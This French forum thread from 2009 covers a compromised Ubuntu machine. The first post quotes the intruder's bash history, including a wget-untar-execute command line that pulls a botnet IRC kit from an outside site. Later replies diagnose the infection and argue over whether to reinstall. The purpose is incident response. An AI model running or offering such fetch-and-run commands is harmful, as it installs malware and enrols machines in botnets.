|
Titre: Qui connait tradelinux.info ? Posté par: balicocat le 12 Décembre 2009 à 12:29:57 hacking ou virus de mon ubuntu 9.04?
a l'origine un compte mal protegé et ssh distant (je sais j'ai trop confiance...) pas dans le sudoers (faut quand meme pas pousser) Qui pourrait m'en dire plus ? #cat /home/invite/.bash_history passwd w ls wget www.tradelinux.info/emech/nou.tgz;tar zxvf nou.tgz;cd tester;./start bum wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe /* le type s'est connecté , a changer le mot de passe, téléchargé 2 archives et executé start Si vous voulez je poste le nou.tgz qui contient plusieurs scripts Et si vous etes interressé, je vous donne plus d'infos ce soir A+ balicocat Titre: Re : Qui connait tradelinux.info ? Posté par: _o_ le 12 Décembre 2009 à 13:58:20 Bonne nouvelle, tu héberges maintenant un joli serveur irc qui doit rentrer dans un botnet quelconque. Les scripts sont écrits avec les pieds, mais ça a l'air opérationnel. Pour ce qui est de l'histoire du SP Windows, tu n'es pas le seul à avoir rencontré ce genre de choses :
http://forums.debian.net/viewtopic.php?f=10&t=47486 http://forums.overclockers.com.au/showthread.php?t=805816 Maintenant, je ne veux pas être pessimiste, mais la machine étant compromise, je ne vois pas d'autre solution qu'un bon gros format et une réinstallation. Et si tu souhaites sauvegarder des données avant, t'as intérêt à contrôler de très près le contenu... Titre: Re : Qui connait tradelinux.info ? Posté par: the lsd le 12 Décembre 2009 à 14:17:07 Fais en une épreuve hack Forensic ! :)
Enjoy The lsd Titre: Re : Qui connait tradelinux.info ? Posté par: balicocat le 12 Décembre 2009 à 18:32:02 mouais, j'y penserai ! =D
Ceci dit, c'était une pénétration par ssh sur un seul compte (sans droits sudo) j'ai désactivé ce compte, re-installé fail2ban (comme un con, je l'avais oublié après avoir changé le DD du PC et réinstalléé le système). Je dois faire plus selon vous ? tout effacer et réinstaller ? Ces scripts peuvent-ils (à la maniere de virus) infecter d'autres fichiers (hors de son /home/). La désactivation de ce compte ne suffit-elle pas ? Edit : J'oubliai : merci pour vos réponses (précedentes et à venir) Titre: Re : Qui connait tradelinux.info ? Posté par: robert33 le 12 Décembre 2009 à 19:49:26 Normalement c'est bon, si ton noyau est à jour (pas d'exploit local) et que c'etait un user simple, (suffit de faire ls -l / et regarder les droits et vérifier les fichiers/dossiers), ton système ne devrait pas être corrompu.
Titre: Re : Re : Qui connait tradelinux.info ? Posté par: _o_ le 13 Décembre 2009 à 00:00:27 Normalement c'est bon, si ton noyau est à jour (pas d'exploit local) et que c'etait un user simple, (suffit de faire ls -l / et regarder les droits et vérifier les fichiers/dossiers), ton système ne devrait pas être corrompu. C'est une blague ? La machine est corrompue, tu n'as que cette certitude. Un noyau à jour ne protège pas d'un 0day. |